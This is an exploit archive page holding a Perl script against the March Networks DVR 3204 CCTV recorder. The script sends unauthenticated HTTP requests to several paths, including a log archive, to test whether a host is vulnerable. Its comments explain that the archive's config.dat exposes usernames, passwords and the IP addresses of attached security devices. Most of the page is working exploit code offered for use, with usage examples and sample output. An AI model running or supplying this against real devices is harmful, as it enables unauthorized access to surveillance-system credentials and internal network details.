exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

dvr3204_exp.txt

dvr3204_exp.txt
Posted Dec 29, 2007
Authored by Alex Hernandez

March networks DVR 3204 logfile information disclosure exploit.

tags | exploit, info disclosure
SHA-256 | a8de9f2ff246734bbfaa7def4155ecf81a21aecd1eef7445b563c86d73e1d08c

dvr3204_exp.txt

Change Mirror Download
#!/usr/bin/perl
#
# March Networks DVR 3204 Logfile Information Disclosure Exploit
#
# Since configuration of the IP address, user console and root is
# carried out over the "administrator console", the vulnerability
# lies within Watchdog's HTTP server application.
#
# Any user can obtain the log files without authentication by accessing
# the following PATH http:/dvraddress/scripts/logfiles.tar.gz. The intruder
# can then uncompress the tar file and access the config.dat to reveal
# username and passwords, names of devices, and IP addresses of other
# security components attached to the corporate networ
#
# More details:
# http://www.sybsecurity.com/resources/static/
# An_Insecurity_Overview_of_the_March_Networks_DVR-CCTV_3204.pdf
#
# By Alex Hernandez ahernandez [at] sybsecurity [dot] com
#
# Usage: perl -x dvr3204_exp.pl www.marchnetworks.com:80
# Usage: perl -x dvr3204_exp.pl 127.0.0.1:80
#
# $ perl -x dvr3204_exp.pl 10.50.10.246:80
# Trying...
#
# THIS HOST IS VULNERABLE!!! :-)
# Check the details on w w w [dot] sybsecurity [dot] c o m
#
# THIS HOST IS NOT VULNERABLE :-(
# Check the settings on browser...
#
#

use Socket;

if ($#ARGV<0) {die "
\nMarch Networks DVR 3204 exploit\n
More details: http://www.sybsecurity.com
By Alex Hernandez\n
ahernandez [at] sybsecurity [dot] com\n

Usage: perl -x $0 www.marchnetworks.com:80
Usage: perl -x $0 127.0.0.1:80\n\n";}

($host,$port)=split(/:/,@ARGV[0]);

print "Trying...\n\n";
$target = inet_aton($host);
$flag=0;

my @results=sendraw("GET /Level1Authenticate.htm HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}

my @results=sendraw("GET /UserAuthenticate.htm HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}

my @results=sendraw("GET /public/index.htm HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}

my @results=sendraw("GET /public/UpgradeStatus.htm HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}

my @results=sendraw("GET /public/UpgradeHistory.htm HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}

my @results=sendraw("GET /public/UpgradeHistory.txt HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}

my @results=sendraw("GET /public/dvrlog HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}

my @results=sendraw("GET /scripts/logfiles.tar.gz HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}

if ($flag==1){print "THIS HOST IS VULNERABLE!!! :-)\n
Check the details on www [dot] sybsecurity [dot] com\n";}
else {print "THIS HOST IS NOT VULNERABLE :-( \n
Check the settings on browser...\n";}

sub sendraw {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect check the port or address...\n"); }
}

Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close